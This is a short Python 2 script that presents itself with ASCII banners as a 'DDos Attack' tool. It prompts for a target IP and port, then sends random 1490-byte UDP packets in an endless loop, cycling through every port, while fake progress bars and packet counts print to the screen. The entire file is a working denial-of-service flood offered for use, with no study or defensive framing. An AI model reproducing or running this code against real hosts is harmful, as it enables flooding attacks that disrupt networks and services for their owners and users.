import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("clear")
print('''                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                            
 ____    ____    ____    ____    ______  ____    ______   __  __  ____        ______  __  __  ____        ______  ______  ______  ______  ____     __  __     
/\  _`\ /\  _`\ /\  _`\ /\  _`\ /\  _  \/\  _`\ /\__  _\ /\ \/\ \/\  _`\     /\__  _\/\ \/\ \/\  _`\     /\  _  \/\__  _\/\__  _\/\  _  \/\  _`\  /\ \/\ \    
\ \ \L\ \ \ \L\ \ \ \L\_\ \ \L\ \ \ \L\ \ \ \L\ \/_/\ \/ \ \ `\\ \ \ \L\_\   \/_/\ \/\ \ \_\ \ \ \L\_\   \ \ \L\ \/_/\ \/\/_/\ \/\ \ \L\ \ \ \/\_\\ \ \/'/'   
 \ \ ,__/\ \ ,  /\ \  _\L\ \ ,__/\ \  __ \ \ ,  /  \ \ \  \ \ , ` \ \ \L_L      \ \ \ \ \  _  \ \  _\L    \ \  __ \ \ \ \   \ \ \ \ \  __ \ \ \/_/_\ \ , <    
  \ \ \/  \ \ \\ \\ \ \L\ \ \ \/  \ \ \/\ \ \ \\ \  \_\ \__\ \ \`\ \ \ \/, \     \ \ \ \ \ \ \ \ \ \L\ \   \ \ \/\ \ \ \ \   \ \ \ \ \ \/\ \ \ \L\ \\ \ \\`\  
   \ \_\   \ \_\ \_\ \____/\ \_\   \ \_\ \_\ \_\ \_\/\_____\\ \_\ \_\ \____/      \ \_\ \ \_\ \_\ \____/    \ \_\ \_\ \ \_\   \ \_\ \ \_\ \_\ \____/ \ \_\ \_\
    \/_/    \/_/\/ /\/___/  \/_/    \/_/\/_/\/_/\/ /\/_____/ \/_/\/_/\/___/        \/_/  \/_/\/_/\/___/      \/_/\/_/  \/_/    \/_/  \/_/\/_/\/___/   \/_/\/_/
                                                                                                                                                              
                                                                                                                                                              

''')
print "[                    ] 0% "
time.sleep(4)
print "[=====               ] 50%"
time.sleep(3)
print "[==========          ] 75%"
time.sleep(4)
print "[===============     ] 100%"
time.sleep(3)
sent = 0
os.system("clear")
os.system("figlet DDos Attack")
print('''                                                                                                                                                                                                                                                                                         
               ______  ______  ______  ______  ____     __  __      __       ______  __  __  __  __  ____     __  __  ____    ____      
              /\  _  \/\__  _\/\__  _\/\  _  \/\  _`\  /\ \/\ \    /\ \     /\  _  \/\ \/\ \/\ \/\ \/\  _`\  /\ \/\ \/\  _`\ /\  _`\    
              \ \ \L\ \/_/\ \/\/_/\ \/\ \ \L\ \ \ \/\_\\ \ \/'/'   \ \ \    \ \ \L\ \ \ \ \ \ \ `\\ \ \ \/\_\\ \ \_\ \ \ \L\_\ \ \/\ \  
               \ \  __ \ \ \ \   \ \ \ \ \  __ \ \ \/_/_\ \ , <     \ \ \  __\ \  __ \ \ \ \ \ \ , ` \ \ \/_/_\ \  _  \ \  _\L\ \ \ \ \ 
                \ \ \/\ \ \ \ \   \ \ \ \ \ \/\ \ \ \L\ \\ \ \\`\    \ \ \L\ \\ \ \/\ \ \ \_\ \ \ \`\ \ \ \L\ \\ \ \ \ \ \ \L\ \ \ \_\ \
                 \ \_\ \_\ \ \_\   \ \_\ \ \_\ \_\ \____/ \ \_\ \_\   \ \____/ \ \_\ \_\ \_____\ \_\ \_\ \____/ \ \_\ \_\ \____/\ \____/
                  \/_/\/_/  \/_/    \/_/  \/_/\/_/\/___/   \/_/\/_/    \/___/   \/_/\/_/\/_____/\/_/\/_/\/___/   \/_/\/_/\/___/  \/___/                                                                                                                                                                                                                                                       

''')
ip = raw_input("USER IP : ")
port = input("USER PORT   : ")

os.system("clear")
print "[                    ] 0% "
time.sleep(5)
print "[=====               ] 25%"
time.sleep(5)
print "[==========          ] 50%"
time.sleep(5)
print "[===============     ] 75%"
time.sleep(5)
print "[====================] 100%"
time.sleep(3)
sent = 0
while True:
     sock.sendto(bytes, (ip,port))
     sent = sent + 1
     port = port + 1
     print "Sent %s packet to %s throught port:%s"%(sent,ip,port)
     if port == 65534:
       port = 1
